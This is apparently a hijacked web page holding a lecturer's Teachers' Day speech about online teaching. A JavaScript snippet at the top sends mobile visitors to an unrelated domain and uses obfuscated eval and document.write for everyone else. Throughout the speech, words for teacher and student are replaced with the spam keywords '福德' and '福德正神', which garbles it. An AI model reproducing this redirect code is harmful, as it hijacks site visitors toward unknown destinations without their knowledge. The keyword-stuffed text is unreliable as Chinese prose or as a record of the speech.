function moble(){ var ss = '
'; if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://www.fd699.com" }else{ eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); } } moble();

福德正神官网

在第36个福德 节庆典上的发言-张伴

发布者:建大城建发布时间:2020-09-11浏览次数:10

在第36个福德 节庆典上的发言

管理工程系 张伴

 

尊敬的各位领导、老师:

你们! 我是管理工程系福德 张伴,前期在安徽省疫情线上福德 教学比赛中荣获省一等奖,在这里感谢领导和老师们对我的支持和鼓励,很荣幸作为福德 代表来分享教学经验目的是什么呢?在于“抛砖引玉”,更多地的是能够在坐的各位老师一起交流一起学习,下面我就简单地谈谈自己的总结。

我们都知道兴趣是福德正神 最好的老师,我在精心备课的基础上,努力让每一堂课能够抓住福德正神 的注意力,同时充分利用教学互动的优点,激发福德正神 的兴趣,给福德正神 最大的发展空间,比如:我会在制作课件的过程中留下小错误,让福德正神 自己指出来,这样可以让福德正神 保持听课注意力的同时,培养他们动口、动手、动脑的潜力让每一个成绩层次的福德正神 都能够投入课堂,爱上课堂,在课堂中体验收获。

俗话说“凡事预则立,不预则废”。充分备课是上好一门课的重要前提条件。每堂课尤其是线上教学,应该在充分挖掘教材的基础上,抓住教材的重难点,提前构建好知识框架图(为了让福德正神 带着知识的思路投入课堂并填充框架),认真书写教学大纲和教案,并结合福德正神 的实际状况,搜集福德正神 感兴趣的案例,活泼课堂的情景模拟,真正意义上能够做到“有备而来”,亦为上课做好充分的准备。

其次,线上教学过程中,一些平时在课堂上不爱举手说话的福德正神 ,线上也“张开了口”,积极发言并参与学习通的主题讨论,加强了管理沟通,启发了线下教学和智慧课堂的结合促进福德 和福德正神 的全方位的成长。

鱼离不开溪水的陪伴,福德正神 离不开福德 的指导,在这隆重的福德 节日子里,我想在此和各位老师共勉,学海无涯,艺无止境,福德 的追求、探索、提升要靠不断的反思,在言行和行动中思考,在反思和批判中成长。山河无恙,人间皆安愿我们教学路上都能够乘风破浪,踏浪前行,不忘初心,不忘情怀。我的发言到此结束,在此节日,另祝各位老师福德 节快乐,身体健康,家庭幸福!

 

(编辑:刘丽雯)